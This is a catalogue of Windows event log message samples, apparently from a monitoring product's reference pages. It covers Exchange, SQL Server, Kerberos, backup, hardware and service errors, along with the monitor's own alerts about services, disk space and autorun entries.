Event ID:
Source:
MSExchangeIS
Message:
Unable to initialize the Microsoft Exchange Information Store service. - Error 0x80004005.


Event ID:
Source:
EventSentry
Category:
TestCategory
Message:
Congratulations! You have just installed and setup up EventSentry (on host TEST3-W2K), which we believe to be the most efficient and economic event log and system monitoring application on the market.
Please visit http://www.eventsentry.com or http://www.netikus.net/ for more information on EventSentry.
Thank you for using EventSentry.



Event ID:
Source:
MSExchangeIS
Message:
Error 0x80004005 connecting to the Microsoft Active Directory


Event ID:
Source:
Security
Message:
Successful Logon:
User Name: <user name>
Domain: <domain name>
Logon ID: <logon identifier>
Logon Type: <logon type>
Logon Process: <logon process>
Authentication Package: <package name>
Workstation Name: <computer name>


Event ID:
Source:
Outlook
Message:
Connection to the Microsoft Exchange Server has been restored


Event ID:
Source:
Application Error
Message:
Faulting application test.exe, version 1.00.0.400, faulting module test.exe, version 1.00.0.400, fault address 0x00031112.



Event ID:
Source:
Security
Message:
A new process has been created:
New Process ID: 860
Image File Name: calc.exe
Creator Process ID: 3492
User Name: MyUser
Domain: NETIKUS
Logon ID: (0x0,0x87F44D2)




Event ID:
Source:
crypt32
Message:
Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.


Event ID:
Source:
Tcpip
Message:
TCP/IP has reached the security limit imposed on the number of concurrent TCP connect attempts.


Event ID:
Source:
MsiInstaller
Message:
Failed to connect to server


Event ID:
Source:
NTBackup
Message:
The 'ESE API' returned 'Unable to perform the operation. Either you can not connect to the specified server
or the service you are trying to connect to is not running.
' from a call to 'HrESEBackupRestoreNodes()' additional data ''


Event ID:
Source:
Netlogon
Message:
The session setup from the computer ComputerName failed to authenticate. The name of the account referenced in the security database is AccountName$.
The following error occurred:
Access is denied.


Event ID:
Source:
MSSQLSERVER
Message:
3041 :
BACKUP failed to complete the command BACKUP LOG [DATABASE] TO DISK = N'E:\Microsoft SQL Server\MSSQL\BACKUP\DatabaseLog.backup' WITH INIT , NOUNLOAD , NAME = N'Database Transaction Log Backup', NOSKIP , STATS = 10, NOFORMAT


Event ID:
Source:
EventLog
Message:
Microsoft (R) Windows (R) 5.02. 3790 Multiprocessor Free.


Event ID:
Source:
EventLog
Message:
The system uptime is 10045 seconds.


Event ID:
Source:
atapi
Message:
The device, \Device\ScsiPort0, did not respond within the timeout period.


Event ID:
Source:
atapi
Message:
The driver detected a controller error on Device\ScsiPort0.


Event ID:
Source:
atapi
Message:
A parity error was detected on [device name].


Event ID:
Source:
Blue Screen Trap
Message:
The firmware update, Version 4.09 P29-09/15/2004, contains critical bug fixes and is the minimum version required. Please perform the update at your earliest convenience. Click on the underlined Version to view more details on the fixes.

Fixes

ProLiant DL380 G3 ROM P29 (09/15/2004)
Updated to integrate the latest Intel processor support code into the System ROM. This works around an issue with the Intel Xeon processor that could cause unexpected behavior or system hang.


Event ID:
Source:
Internet Explorer
Message:
The '..' characters are not allowed in the Path parameter for the MapPath method


Event ID:
Source:
EventSentry
Message:
The event description will show any message received through the syslog protocol


Event ID:
Source:
E100B
Message:
Adapter Intel(R) PRO/100 VE Network Connection: Did not receive auto-negotiation advertisement from link partner. A full duplex connection may be available.


Event ID:
Source:
RemoteAccess
Message:
The user xxx\xxx failed an authentication attempt due to the following reason: The user could not be authenticated using Challenge Handshake Authentication Protocol (CHAP). A reversibly encrypted password does not exist for this user account. To ensure that reversibly encrypted passwords are enabled, check either the domain password policy or the password settings on the user account.

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.


Event ID:
Source:
Kerberos
Message:
The kerberos subsystem encountered a PAC verification failure. This indicates that the PAC from the client computername$ in realm DOMAIN.LOCAL had a PAC which failed to verify or was modified. Contact your system administrator.



Event ID:
Source:
Kerberos
Message:
The kerberos subsystem is having problems fetching tickets from your domain controller using the UDP network protocol. This is typically due to network problems. Please contact your system administrator.


Event ID:
Source:
Internet Explorer
Message:
/projectserver/Library/pjquery.asp, line 658


Event ID:
Source:
Application Management
Message:
MSI Error - 2755 -

Failed to apply changes to software installation settings. Software changes could not be applied. A previous log entry with details should exist. The error was : The Temp folder is on a drive that is full or is inaccessible. Free up space on the drive or verify that you have write permission on the Temp folder.


Event ID:
Source:
TermDD
Message:
The RDP protocol component "DATA ENCRYPTION" detected an error in the protocol stream and has disconnected the client.


Event ID:
Source:
OMA Windows 2003
Message:
An unknown error occurred while processing the current request: Exception of type Microsoft.Exchange.OMA.DataProviderInterface.ProviderException was thrown.

Stack trace:
at Microsoft.Exchange.OMA.UserInterface.Global.Session_Start(Object sender, EventArgs e)
at System.Web.SessionState.SessionStateModule.CompleteAcquireState()
at System.Web.SessionState.SessionStateModule.BeginAcquireState(Object source, EventArgs e, AsyncCallback cb, Object extraData)
at System.Web.AsyncEventExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)

Inner Error: Exception has been thrown by the target of an invocation.

Stack trace:
at System.Reflection.RuntimeConstructorInfo.InternalInvoke(BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture, Boolean isBinderDefault)
at System.Reflection.RuntimeConstructorInfo.Invoke(BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)
at System.RuntimeType.CreateInstanceImpl(BindingFlags bindingAttr, Binder binder, Object[] args, CultureInfo culture, Object[] activationAttributes)
at System.Activator.CreateInstance(Type type, BindingFlags bindingAttr, Binder binder, Object[] args, CultureInfo culture, Object[] activationAttributes)
at Microsoft.Exchange.OMA.UserInterface.Global.Session_Start(Object sender, EventArgs e)

Inner Error: The remote server returned an error: (403) Forbidden.

Stack trace:
at Microsoft.Exchange.OMA.ExchangeDataProvider.OmaWebRequest.GetRequestStream()
at Microsoft.Exchange.OMA.ExchangeDataProvider.ExchangeServices.GetSpecialFolders()
at Microsoft.Exchange.OMA.ExchangeDataProvider.ExchangeServices..ctor(UserInfo user)

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.




Event ID:
Source:
MSSQL$BKUPEXEC
Message:
18272 :

I/O error on backup or restore restart-checkpoint file 'C:\Program Files\Microsoft SQL Server\MSSQL$BKUPEXEC\backup\model4IDR.ckp'. Operating system error 3(error not found). The statement is proceeding but is non-restartable.


Event ID:
Source:
MSExchangeSA
Message:
Referral Interface cannot contact any Global Catalog that supports the NSPI Service. Clients making RFR requests will fail to connect until a Global Catalog becomes available again. After a Domain Controller is promoted to a Global Catalog, it must be rebooted to support MAPI Clients.


Event ID:
Source:
Message:
When performing a RSOP to a remote computer you get: You do not have permission to perform this operation. Access is denied.


Event ID:
Source:
Microsoft Operations Manager
Message:
The MOM Server failed to install agent on remote computer xxxx-cb00.xxxx.local.

Error Code: -2147024891

Error Description: Access is denied.

Microsoft Installer Error Description: No Description Available


Event ID:
Source:
MOM Operator Console
Message:
The response processor failed to execute a response. The response returned the error message: The remote procedure call failed.

Response Details:

Rule ID: {xxx-xxx-xx-x-x-x-x-x}
Response description: script: bla
Time of Last Event: 1/14/2005 8:32:42 AM
Time Raised: 1/14/2005 8:32:33 AM
Rule Name: The rule response failed to execute
Modified By: NT AUTHORITY\NETWORK SERVICE


Event ID:
Source:
Userenv
Message:
Windows cannot access the file gpt.ini for GPO CN=31B2F340-016D-11D2-945F-00C04FB984F9,CN=Policies,CN=System,DC=xxxx,DC=local. The file must be present at the location <\\xxxx.local\sysvol\xxxx.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\gpt.ini>. (Configuration information could not be read from the domain controller, either because the machine is unavailable, or access has been denied. ). Group Policy processing aborted.


Event ID:
Source:
MSExchangeOMA
Message:
An unknown error occurred while processing the current request:
Message: The remote server returned an error: (403) Forbidden.
Source: Microsoft.Exchange.OMA.ExchangeDataProvider
Stack trace:
at Microsoft.Exchange.OMA.ExchangeDataProvider.OmaWebRequest.GetRequestStream()
at Microsoft.Exchange.OMA.ExchangeDataProvider.ExchangeServices.GetSpecialFolders()
at Microsoft.Exchange.OMA.ExchangeDataProvider.ExchangeServices..ctor(UserInfo user)

Message: Exception has been thrown by the target of an invocation.
Source: mscorlib
Stack trace:
at System.Reflection.RuntimeConstructorInfo.InternalInvoke(BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture, Boolean isBinderDefault)
at System.Reflection.RuntimeConstructorInfo.Invoke(BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)
at System.RuntimeType.CreateInstanceImpl(BindingFlags bindingAttr, Binder binder, Object[] args, CultureInfo culture, Object[] activationAttributes)
at System.Activator.CreateInstance(Type type, BindingFlags bindingAttr, Binder binder, Object[] args, CultureInfo culture, Object[] activationAttributes)
at Microsoft.Exchange.OMA.UserInterface.Global.Session_Start(Object sender, EventArgs e)

Message: Exception of type Microsoft.Exchange.OMA.DataProviderInterface.ProviderException was thrown.
EventMessage:
UserMessage: A System error has occurred while processing your request. Please try again. If the problem persists, contact your administrator.
Source: Microsoft.Exchange.OMA.UserInterface
Stack trace:
at Microsoft.Exchange.OMA.UserInterface.Global.Session_Start(Object sender, EventArgs e)
at System.Web.SessionState.SessionStateModule.RaiseOnStart(EventArgs e)
at System.Web.SessionState.SessionStateModule.CompleteAcquireState()
at System.Web.SessionState.SessionStateModule.BeginAcquireState(Object source, EventArgs e, AsyncCallback cb, Object extraData)
at System.Web.AsyncEventExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)


Event ID:
Source:
NTBackup
Message:
The 'Active Directory' returned 'A disk I/O error occurred.
' from a call to 'BackupTruncateLogs()' additional data '-'.


Event ID:
Source:
SQLSERVERAGENT
Message:
The data portion of event 19002 from MSSQLSERVER is invalid.



Event ID:
Source:
PureMessage
Message:
Spam rules update error (CopyFile, dwError = 32) (Error code 0x80041F04) occurred.


Event ID:
Source:
NtFrs
Message:
Event Type: Warning
Event Source: NtFrs
Event Category: None
Event ID: 13565
Date: 10.03.2005
Time: 18:09:24
User: N/A
Computer: xxxx
Description:
File Replication Service is initializing the system volume with data from another domain controller. Computer XXXX-CB01 cannot become a domain controller until this process is complete. The system volume will then be shared as SYSVOL.

To check for the SYSVOL share, at the command prompt, type:
net share

When File Replication Service completes the initialization process, the SYSVOL share will appear.

The initialization of the system volume can take some time. The time is dependent on the amount of data in the system volume, the availability of other domain controllers, and the replication interval between domain controllers.


Event ID:
Source:
PerfLib
Message:
The data buffer created for the "MSExchangeIS" service in the "C:\Program Files\Exchsrvr\bin\mdbperf.dll" library is not aligned on an 8-byte boundary. This may cause problems for applications that are trying to read the performance data buffer. Contact the manufacturer of this library or service to have this problem corrected or to get a newer version of this library.


Event ID:
Source:
Service Control Manager
Message:
The Microsoft Exchange Routing Engine service failed to start due to the following error:
The executable program that this service is configured to run in does not implement the service.


Event ID:
Source:
DCOM
Message:
The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
0C0A3666-30C9-11D0-8F20-00805F2CD064
to the user BULL\IWAM_BULL SID (BULL\IWAM_BULL). This security permission can be modified using the Component Services administrative tool.


Event ID:
Source:
Service Control Manager
Message:
The Microsoft Exchange Information Store service terminated with service-specific error 0 (0x0).


Event ID:
Source:
LSASRV
Message:
The Security System could not establish a secured connection with the server DNS/lyra.u.arizona.edu. No authentication protocol was available


Event ID:
Source:
WLBS
Message:
WLBS : host 1 does not have the same number or type of port rules as this host. Please check WLBS Setup dialog on all machines that belong to the cluster and make sure that they all contain the same number and the same type of port rules.


Event ID:
Source:
EventSentry
Message:
The status for service HTTPFilter (HTTP SSL) changed from Stopped to Running.


Event ID:
Source:
AutoEnrollment
Message:
Automatic certificate enrollment for local system failed to enroll for one Enrollment Agent (Computer) certificate (0x80094012). The permissions on the certificate template do not allow the current user to enroll for this type of certificate.


Event ID:
Source:
MSExchangeTransport
Message:

Event ID:
Source:
MSExchangeTransport
Message:
The categorizer is unable to categorize messages due to a retryable error.


Event ID:
Source:
Security
Message:
Logon Failure:
Reason: The user has not been granted the requested
logon type at this machine
User Name: %1
Domain: %2
Logon Type: %3
Logon Process: %4
Authentication Package: %5
Workstation Name: %6


Event ID:
Source:
DHCP
Message:
The IP address lease %1 for the Network Card with network address %2 has been denied by the DHCP server %3 (The DHCP Server sent a DHCPNACK message).


Event ID:
Source:
Winlogon
Message:
The shell stopped unexpectedly and %1 was restarted.


Event ID:
Source:
Service Control Manager
Message:
The PfModNT service failed to start due to the following error:
The system cannot find the file specified.



Event ID:
Source:
Print
Message:
Printer Canon Bubble-Jet BJC-85 (from RACOON) is pending deletion.



Event ID:
Source:
EventSentry
Message:
EventSentry was unable to query the local audit policy settings. A call to open the LSA policy failed with error Access is denied.. Please see the EventSentry documentation for troubleshooting advice on this problem.


Event ID:
Source:
Security
Message:
The Windows Firewall has detected an application listening for incoming traffic.

Name: -
Path: C:\WINDOWS\system32\svchost.exe
Process identifier: 1160
User account: SYSTEM
User domain: NT AUTHORITY
Service: Yes
RPC server: No
IP version: IPv4
IP protocol: UDP
Port number: 68
Allowed: No
User notified: No



Event ID:
Source:
MSExchangeSA
Message:

Event ID:
Source:
MRxSmb
Message:
{Delayed Write Failed} Windows was unable to save all the data for the file \Device\LanmanRedirector. The data has been lost. This error may be caused by a failure of your computer hardware or network connection. Please try to save this file elsewhere.


Event ID:
Source:
EM Library
Message:
The "\\SERVER\SophosSBE\" library update task has failed. INDEX 0x8000ffff
Update failed. Parent could not be accessed. Check the parent address/path and access settings. INDEX 0x8000ffff
Could not read the EM Library database. MCID 0x80040403
Could not open requested resource "/update/index/00000000.db". VFS 0x80040403
A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
Failed to make a connection. VFS 0x80040407
A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
Could not open requested resource "/update/index/db.inf". VFS 0x80040403
A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.


Event ID:
Source:
Service Control Manager
Message:
The ServiceABC service terminated unexpectedly. It has done this 3 time(s). The following corrective action will be taken in 0 milliseconds: No action.


Event ID:
Source:
KDC
Message:
The Security Account Manager failed a KDC request in an unexpected way. The error is in the data field. The account name was username@MYDOMAIN.LOCAL and lookup type 0x28.


Event ID:
Source:
Message:
An error occurred during a scheduled backup of drive I:\.
Error EA39070A: The internal structure of the PQI file is invalid or unsupported.
Details: 0xEA39070A
Source: Norton Ghost 9.0


Event ID:
Source:
Active Server Pages
Message:
Error: The Template Persistent Cache initialization failed for Application Pool 'DefaultAppPool' because of the following error: Could not create a Disk Cache Sub-directory for the Application Pool. The data may have additional error codes..


Event ID:
Source:
Norton Antivirus
Message:
An infected file has been found.


Event ID:
Source:
NTBackup
Message:
Begin Backup of SERVER\Microsoft Information Store\First Storage Group' Verify: Off Mode: Append Type: Normal


Event ID:
Source:
NTBackup
Message:
End Backup of 'SERVER\Microsoft Information Store\First Storage Group' Verify: Off Mode: Append Type: Normal


Event ID:
Source:
EventSentry
Message:
Unable to connect to SMTP host email.company.com due to error 'Unable to establish TCP connection (10065). If you are running McAfee Anti-Virus then make sure that outgoing SMTP traffic is not blocked from this machine (e.g. "Access Protection") and that no firewall is blocking traffic between this host and the mail server.


Event ID:
Source:
EventSentry
Message:
The process notification (target) "My Process" successfully executed the process "c:\batch\backup.cmd".


Event ID:
Source:
EventSentry
Message:
The process notification (target) "MyProcess" was unable to execute the process "c:\batch\mybatchfile.cmd" due to error 5.


Event ID:
Source:
EventSentry
Message:
User DOMAIN\User has successfully connected to host REMOTE from host LOCAL with the EventSentry management application.


Event ID:
Source:
EventSentry
Message:
When monitoring the Application event log, the EventSentry agent missed events between number 980 to 984. EventSentry will attempt to read those events at a later time to make sure that all events from the Application log are being processed.


Event ID:
Source:
EventSentry
Message:
The EventSentry agent has successfully adjusted the permissions of the configuration registry key HKLM\Software\netikus.net\EventSentry. 3 ACE entries (one of the following: Users, Power Users, Everyone) were removed to increase security.


Event ID:
Source:
W32Time
Message:
Time Provider NtpClient: This machine is configured to use the domain hierarchy to determine its time source, but it is the PDC emulator for the domain at the root of the forest, so there is no machine above it in the domain hierarchy to use as a time source. It is recommended that you either configure a reliable time service in the root domain, or manually configure the PDC to synchronize with an external time source. Otherwise, this machine will function as the authoritative time source in the domain hierarchy. If an external time source is not configured or used for this computer, you may choose to disable the NtpClient.


Event ID:
Source:
Browser
Message:
The browser was unable to retrieve a list of servers from the browser master \\DC on the network \Device\NetBT_Tcpip_631A8496-9308-4979-9849-............ The data is the error code.


Event ID:
Source:
LicenseService
Message:
Replication of license information failed because the License Logging Service on server <Server> could not be contacted.



Event ID:
Source:
NETLOGON
Message:
No Windows NT or Windows 2000 Domain Controller is available for domain Domain. The following error occurred:

There are currently no logon servers available to service the logon request.


Event ID:
Source:
Active Server Pages
Message:
Error: The Template Persistent Cache initialization failed for Application Pool 'DefaultAppPool' because of the following error: Could not create a Disk Cache Sub-directory for the Application Pool. The data may have additional error codes..


Event ID:
Source:
SQLSERVERAGENT
Message:
Unable to read local eventlog (reason: The data area passed to a system call is too small).


Event ID:
Source:
EventSentry
Message:
The EventSentry service could not start because of a configuration error. Please make sure that you have at least one filter and target or the syslog daemon configured.


Event ID:
Source:
EventSentry
Message:
Error during SMTP communication with SMTP host %1. After sending "%2" the following error occurred: %3.


Event ID:
Source:
EventSentry
Message:
Unable to connect to SMTP host %1 due to error %2. Will try backup smtp host %3 now.


Event ID:
Source:
EventSentry
Message:
Unable to open parallel port LPTx. Please make sure that no application is currently using this printer port, also make sure that no printer is using port LPTx. You might have to restart the service after the resource conflict is solved.


Event ID:
Source:
EventSentry
Message:
Unable to start service because no valid license was found.


Event ID:
Source:
EventSentry
Message:
The configuration for the agent (service) was successfully re-read from the registry.


Event ID:
Source:
EventSentry
Message:
The custom event log MyCustomLog is not configured on this system. You will not be able to monitor this event log on this system. The service (agent) will continue to run without interruption.


Event ID:
Source:
EventSentry
Message:
The temporary file %1 has been found but no filter referencing this target (%2) is configured for a summary notification. The file has been deleted.


Event ID:
Source:
EventSentry
Message:
The following service was added: UtilMan (Utility Manager). Current service state is Stopped, service is using binary file C:\WINNT\System32\UtilMan.exe.


Event ID:
Source:
LicenseService
Message:
Replication of license information failed because the License Logging Service on server <PDC servername> could not be contacted.


Event ID:
Source:
EventSentry
Message:
The following x service(s) are configured to AUTOSTART but are currently not running:
Cdaudio
Changer
CD-Burning Filter Driver
lbrtfdc
mrtRate
PCIDump
Sfloppy
Security Center


Event ID:
Source:
MsiInstaller
Message:
Product: J2SE Runtime Environment 5.0 Update 4 -- Installation failed.


Event ID:
Source:
AutoEnrollment
Message:
Automatic certificate enrollment for local system failed to contact the active directory (0x8007054b). The specified domain either does not exist or could not be contacted.
Enrollment will not be performed.


Event ID:
Source:
MSExchangeIS Public Store
Message:
user@domain.com failed an operation on folder /O=ORG/OU=FIRST ADMINISTRATIVE GROUP/CN=RECIPIENTS/CN=OAB VERSION 3AD24215E446FED006D7E903A387A01BE4002721 on database "First Storage Group\Public Folder Store (SERVER)" because the user did not have the following access rights:
'Delete' 'Read Property' 'Write Property' 'Create Message' 'View Item' 'Create Subfolder' 'Write Security Descriptor' 'Write Owner' 'Read Security Descriptor' 'Contact'
The entry ID of the folder is in the data section of this event.


Event ID:
Source:
IMAP4SVC
Message:
DS lookup for user [USERNAME], connecting from 10.10.10.1, failed with error 0x80040920.


Event ID:
Source:
IMAP4SVC
Message:
Authentication attempt from 10.10.10.1 to [USERNAME] has failed with error 0x52e.


Event ID:
Source:
EvntAgnt
Message:
Error reading log event record. Handle specified is %d. Return code from ReadEventLog is 122.


Event ID:
Source:
Backup Exec
Message:
Backup Exec Alert: Job Failed(Server:


Event ID:
Source:
EventSentry
Message:
Application UserFaultCheck (%systemroot%\system32\dumprep 0 -u) was removed from the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and will no longer be run when a user logs into the system.



Event ID:
Source:
Security
Message:
Object Open: Object Server: SC Manager Object Type: SERVICE OBJECT Object Name: RemoteAccess New Handle ID: - Operation ID: {0,840128961} Process ID: 416 Primary User Name: CLMTS001$ Primary Domain: ATSC Primary Logon ID: (0x0,0x3E7) Client User Name: e010421 Client Domain: ATSC Client Logon ID: (0x0,0x32125658) Accesses Query status of service Privileges -


Event ID:
Source:
MsiInstaller
Message:
Failed to connect to server. Error: 0x800401F0


Event ID:
Source:
Ftdisk
Message:
The system failed to flush data to the transaction log. Corruption may occur.


Event ID:
Source:
iScsiPrt
Message:
Failed to setup initiator portal. Error status is given in the dump data.


Event ID:
Source:
ESENT
Message:
wuaueng.dll (620) SUS20ClientDataStore: A request to write to the file


Event ID:
Source:
MegaServ.Log
Message:
Adapter 1: Battery Voltage LOW.


Event ID:
Source:
Application Management
Message:
The assignment of application Command AntiVirus for Windows Enterprise from policy Command AV failed. The error was: The group policy framework should call the extension in the synchronous foreground policy refresh.


Event ID:
Source:
Application Management
Message:
The install of application "application name" from policy "policy name" failed. The error was : The installation source for this product is not available. Verify that the source exists and that you can access it.



Event ID:
Source:
MSExchangeIS
Message:
Unexpected error 0x8004010f occurred in


Event ID:
Source:
NTDS Replication
Message:
Active Directory attempted to perform a remote procedure call (RPC) to the following server. The call timed out and was cancelled.

Server:
6d0f4d18-521c-4429-8d8e-06faf22b4f57._msdcs.ds.han.xx
Call Timeout (Mins):
5
Thread ID:
fcc

Additional Data
Internal ID:
5001047


Event ID:
Source:
PerfDisk
Message:
Unable to read the disk performance information from the system. Disk performance counters must be enabled for at least one physical disk or logical volume in order for these counters to appear. Disk performance counters can be enabled by using the Hardware Device Manager property pages. Status code returned is data DWORD 0.


Event ID:
Source:
Backup Exec
Message:
Backup Exec Alert: Tape Alert Warning
(Server: "FILE") (Job: "Company - Differential Slot 6") Warning - Library security has been compromised.
Robotic Library for Device: DELL 3


Event ID:
Source:
Security
Message:
Backup of data protection master key.
Key Identifier: ab7287ab-974d-4dc7-aaaa-91e0bc96642e
Recovery Server:
Recovery Key ID:
Failure Reason: 0x3A


Event ID:
Source:
Security
Message:
Object Open: Object Server: Security Object Type: File Object Name: \Device\NetbiosSmb Handle ID: - Operation ID: {0,1502291133} Process ID: 1144 Image File Name: C:\WINDOWS\system32\svchost.exe Primary User Name: LOCAL SERVICE Primary Domain: NT AUTHORITY Primary Logon ID: (0x0,0x3E5) Client User Name: - Client Domain: - Client Logon ID: - Accesses: SYNCHRONIZE ReadData (or ListDirectory) WriteData (or AddFile) Privileges: - Restricted Sid Count: 0 Access Mask: 0x100003


Event ID:
Source:
EventSentry
Message:
The status for service WmiApSrv (WMI Performance Adapter) changed from Running to Stopped.


Event ID:
Source:
Userenv
Message:
Kan het registerbestand niet verwijderen. Als u een zwervend profiel hebt, worden uw instellingen niet gerepliceerd. Neem contact op met de systeembeheerder.
Details: Toegang geweigerd. , buildnummer ((2195)).



Event ID:
Source:
Navisphere Agent
Message:
Time Stamp 12/31/05 18:59:05 Event Number 908 Severity Error Host CX300_SPB Storage Array APM00050506804 SPB Device SP B Description Fault - Cache Disabling


Event ID:
Source:
EventSentry
Message:
The service mouhid (Mouse HID Driver) is now being monitored. Current service status is Running.


Event ID:
Source:
EventSentry
Message:
The following service was added: APC UPS Service (APC UPS Service). Current service state is Running, service is using binary file C:\Program Files\APC\APC PowerChute Personal Edition\mainserv.exe.


Event ID:
Source:
EventSentry
Message:
The following service was removed: APC UPS Service (APC UPS Service). Last service state was Running.


Event ID:
Source:
EventSentry
Message:
The service Abiosdsk (Abiosdsk) will not be monitored anymore. Last service status was Stopped.


Event ID:
Source:
EventSentry
Message:
"c:\batch\db_upd.cmd" was run for 381 seconds with the result shown below. Return Code was 0.
Downloading file ...
Dropping existing tables ...
Decompressing download file ...
Importing SQL data ...
Done.


Event ID:
Source:
EventSentry
Message:
The process "c:\batch\update.cmd" could not be created due to the following error:
The system cannot find the path specified.


Event ID:
Source:
EventSentry
Message:
The process superdel.exe exceeded the maximum allowed time interval of 15 minute(s). EventSentry was unable to terminate the process due to the following error: Acess Denied.


Event ID:
Source:
EventSentry
Message:
The process C:\temp\vnc-4_1_1-x86_win32.exe exceeded the maximum allowed time interval of 1 minute(s). The process was terminated. Please increase the timeout interval for this process in the management application (System Health -> Application Scheduler).


Event ID:
Source:
EventSentry
Message:
The Application event log was successfully cleared.


Event ID:
Source:
EventSentry
Message:
The shortcut PerformanceEnhancer.lnk (using file C:\Windows\evilvirus.exe) registered itself in the directory C:\Documents and Settings\All Users\Start Menu\Programs\Startup and will be automatically run when a user logs into the system.


Event ID:
Source:
EventSentry
Message:
The Application event log was successfully backed up to file C:\EVENTLOG BACKUP\APPLICATION_ 2005_08_18.EVT.



Event ID:
Source:
EventSentry
Message:
The Security event log was successfully cleared and backed up to file V:\CENTRAL EVENT LOG BACKUP\WHALE_SECURITY_08022006_1400.EVT.


Event ID:
Source:
EventSentry
Message:
The Security event log could not be cleared due to the following error: Access is Denied.


Event ID:
Source:
EventSentry
Message:
The Application event log could not be backed up to file C:\BACKUP\ESLOG\BULL_09022006.EVT due to the following error:
Cannot create a file when that file already exists.


Event ID:
Source:
EventSentry
Message:
The System event log could not be cleared and backed up due to the following error: Access is Denied.


Event ID:
Source:
EventSentry
Message:
Full event logs cannot be detected on this machine, this feature is not supported on this platform (only Windows 2000 or higher).


Event ID:
Source:
EventSentry
Message:
The process explorer.exe (PID 828) seems to be leaking "Working Set" memory. If you keep seeing this message in the event log then it is recommended that you monitor the memory consumption of this process closely with performance monitor if you have not already done so.
The process is currently using 5738496 bytes of "Working Set" memory, system memory load is 87%.
If you are certain that this process is not leaking memory then you can exclude this process from being monitored or change the monitoring parameters (contact support@netikus.net for more information) in the registry. If this process is leaking memory then contact the manufacturer of the application for support.



Event ID:
Source:
EventSentry
Message:
The process eventsentry_gui.exe is not active.


Event ID:
Source:
EventSentry
Message:
Free disk space for drive V:\ is below the configured limit of 4 percent. 3.31 percent of disk space (985 Mb) are currently available on drive V:\.


Event ID:
Source:
EventSentry
Message:
Free disk space for drive C:\ is below the configured limit of 500 Mb. 152 Mb of disk space are currently available on drive C:\.


Event ID:
Source:
EventSentry
Message:
Application NTToolkit was installed.
Additional Information:
Publisher: NETIKUS.NET ltd
Installation Directory: C:\Program Files\NTToolkit
Version: 1.91


Event ID:
Source:
EventSentry
Message:
Application NToolkit (NTToolkit) was uninstalled.


Event ID:
Source:
EventSentry
Message:
Application QuickTime Task ("C:\Program Files (x86)\QuickTime\qttask.exe" -atboottime) registered itself in the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and will be automatically run when a user logs into the system.


Event ID:
Source:
EventSentry
Message:
The registry value AppInit_DLLs in key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows changed from "" to "wbsys.dll". All files specified in this value will be automatically run when a user logs into the system.


Event ID:
Source:
EventSentry
Message:
Application UserFaultCheck (%systemroot%\system32\dumprep 0 -u) was removed from the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and will no longer be run when a user logs into the system.


Event ID:
Source:
EventSentry
Message:
The application eraseallfiles.exe registered itself in the directory c:\Documents and Settings\All Users\Start Menu\Programs\Startup and will be automatically run when a user logs into the system.


Event ID:
Source:
EventSentry
Message:
The shortcut PerformanceEnhancer.lnk (using file C:\windows\evilvirus.exe) was removed from directory C:\Documents and Settings\All Users\Start Menu\Programs\Startup and will no longer run when a user logs into the system.


Event ID:
Source:
EventSentry
Message:
Application YourPersonalAdware.exe was added to the registry key HKLM\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup and will be automatically run when the system boots.


Event ID:
Source:
EventSentry
Message:
Application YourPersonalAdware.exe was removed from the registry key HKLM\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup and will no longer be run the system boots.


Event ID:
Source:
EventSentry
Message:
The application >26923b43-4d38-484f-9b9e-de460746276c registered file %systemroot%\system32\shmgrate.exe OCInstallUserConfigIE in registry key SOFTWARE\Microsoft\Active Setup\Installed Components and might be automatically run when a user logs into the system. Please see the help file (search for ACTIVE SETUP) for more information.



Event ID:
Source:
Kerberos
Message:
There were password errors using the Credential Manager. To remedy, launch the Stored User Names and Passwords control panel applet, and reenter the password for the credential DOMAIN\myadmin.


Event ID:
Source:
EventSentry
Message:
Application >60B49E34-C7CC-11D0-8953-00A0C90347FF (using file ) was removed from the registry key HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components and will no longer be run when a user logs into the system.


Event ID:
Source:
EventSentry
Message:
There was an error (999) monitoring registry key HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components. Please restart the EventSentry agent or notify NETIKUS.NET support if this problem persists. Autorun monitoring will NOT continue.


Event ID:
Source:
vmauthd
Message:
VMware process did not start properly.


Event ID:
Source:
EventSentry
Message:
The explorer extension DLL SecretMalwareDLL (using file ieatfiles.dll) was removed from the registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify and will no longer be loaded into explorer.exe.


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter "Memory\Available MBytes" fell below the threshold of 10, the current average is 9.


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter "%1" (instance "%2") fell below the threshold of %3, the current average is %4.


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter "%1" equals the threshold of %2.


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter "Process(*)\Thread Count" (instance "myapp") equals the threshold of 20.


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter "%1" exceeded the threshold of %2, the current average is %3.


Event ID:
Source:
